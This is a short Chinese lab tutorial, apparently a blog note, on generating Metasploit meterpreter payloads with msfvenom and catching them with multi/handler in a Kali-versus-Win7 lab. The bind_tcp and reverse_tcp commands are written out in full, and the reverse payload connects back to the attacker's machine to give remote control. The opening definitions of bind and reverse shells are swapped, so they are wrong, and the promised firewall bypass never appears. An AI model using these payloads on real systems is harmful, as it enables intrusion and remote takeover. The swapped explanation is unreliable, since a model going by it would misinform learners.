从MSF载荷生成到Windows防火墙绕过
正向shell与反向shell的本质区别:
bind_tcp是靶机主动连接攻击机的ip与端口,建立shell连接
reverse_tcp则是靶机等待攻击者连接(但第一步是靶机主动发起连接,然后等待)
其中前者易受防火墙的影响
ps:shell就像一个攻击机遥控受害机的遥控器
这里我们的攻击机是kali——192.168.145.128,目标机是win7——192.168.145.160
msf
工具 | 作用 |
|---|---|
Msfvenom | 生成恶意程序 |
Exploit模块 | 利用漏洞执行 |
Multi/Handler | 接收连接 |
数据库模块 | 扫描结果 |
正向连接演示:
kali:msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=5555 -f exe -o b_op.exe

所以:b_op.exe运行后,目标机(win7)的5555端口开启监听
复制到win7去
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set RHOST 192.168.145.160
set LPORT 5555

run!win7打开恶意文件之后回显成功

反向连接演示
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.145.128 LPORT=9999 -f exe -o r_op.exe


其余类比bindshell



防火墙加固
win7
进入任务管理器把刚才的b_op.exe和r_op.exe结束进程
不再有端口被监听

